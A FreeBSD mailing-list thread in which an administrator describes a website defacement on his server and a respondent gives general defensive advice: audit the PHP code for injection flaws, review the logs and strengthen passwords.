Squirrel wrote:
My server was hacked, and the hacker was nice enough to not cause
damage except changing index.php of couple of my websites. The
index.php had the following info:
"Hacked By Top First Warning That's Bug From Your Servers Next Time
You Must Be Careful And Fixed Your Site Before Coming Another Hacker
And Hacked You Again Sorry Admin And Don't Worry Just I Change Index
ALTBTA For Contact : l...@hotmail.com Best Wishes"
i won't be sure he has changed only indexes, it's a good rule to check
carefully every other file or revert to a backup precedent to the hacking.
Of course, I sent him email, just in case it's valid, asking how he
did it or how should I patch things up. But haven't got a reply yet.
I've looked at all the log files, particularly auth.log, although
there were thousands of login attempts to SSH and FTP, but none
succeeded. And I don't know where else to look, please help.
I'm using FreeBSD 7.1-Release with below daemons
Apache 2.2.11 ProFTP 1.32 OpenSSH 5.1 Webmin 1.480 MySQL 5.0.67 BIND
9.6.0
most likely could be some kind of remote code execution or SQLi executed in the
context of some php scripts, you should audit php code of your web interface
and of the websites you host.
also consider the strenght of your passwords, lots of login attempts to ssh/ftp
may mean a he has tried a bruteforce (or a dictionary attack maybe). you should
also check webmin logs, there are a few bruteforcer for webmin out there,
(*hint*) consider the lenght of your average password if it's more than 7-8
characters aplhanumeric with simbols most likely this isn't the case.
check (if you have them) logs of urls requested and mysql errors, the answer
could be find here probably.
regards
ocean
_______________________________________________
freebsd-stable@freebsd.org mailing list
http://lists.freebsd.org/mailman/listinfo/freebsd-stable
To unsubscribe, send any mail to "freebsd-stable-unsubscr...@freebsd.org"
